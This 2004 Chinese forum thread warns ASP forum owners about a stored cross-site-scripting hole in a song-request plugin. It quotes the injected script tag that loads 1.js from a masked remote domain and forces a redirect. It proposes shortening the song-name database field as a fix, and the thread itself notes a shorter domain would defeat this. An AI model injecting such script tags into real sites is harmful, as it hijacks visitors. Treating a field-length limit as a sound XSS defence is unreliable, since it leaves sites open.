【重要】点歌插件漏洞及解决办法

楼主 茶博士 于 2004-10-24 19:24:03
【重要】点歌插件漏洞及解决办法
现象:打开点歌列表页跳出警告窗口,点确定后跳转到一个网站。[COLOR=red]如果是论坛首页调用,点歌问题更严重,访问论坛首页即跳转页面。[/COLOR]

[IMG]http://bbs.asp163.net/UploadFile/2004-10/20041024192953395.gif[/IMG]

原理:别有用心者利用点歌插件,在“歌曲名字”中输入[COLOR=red]<script src="http://**.cn/1.js"></script>[/COLOR],读取1.js,即刻弹出警告窗口并跳转页面。(1.JS内容略,以防别有用心者学去)

解决:[COLOR=red]下载点歌插件数据库,打开Media表,在“设计视图”中设定medianame字段长由原来的100改为40,[/COLOR]上述<script src="http://**.cn/1.js"></script>即不能写入。当然,如果恶意网站域名更短http://*.cn/1.js就改为39吧。

有此需要的朋友看后顶一下,让更多人知道。因为这实在很烦人,我的论坛已经两次受到恶意侵害了。


还有别的方法,如果在点歌插件write.asp文件中,设定遇到<script就不能写入也可以吧,但我不会:)

[COLOR=blue](Delong 朋友提供了另一种完全修改办法,详见下页。)[/COLOR]
回复
1楼 tywubin 于 2004-10-24 23:59:08
谢谢楼主了
回复
2楼 梦在何方 于 2004-10-25 00:03:05
第二楼,顶起来先!
回复
3楼 jlzqh 于 2004-10-26 10:42:05
偶的论坛昨天就出现了,没办法只好删除该插件了。
回复
4楼 marcel 于 2004-10-26 16:11:43
[IMG]../images/bf/FACE5.GIF[/IMG]支持````````
回复
5楼 jpg 于 2004-10-26 18:17:18
还有这事情哦呵呵.要解决了.
回复
123 6  

电脑版 Page created in 0.1133 seconds with 4 queries.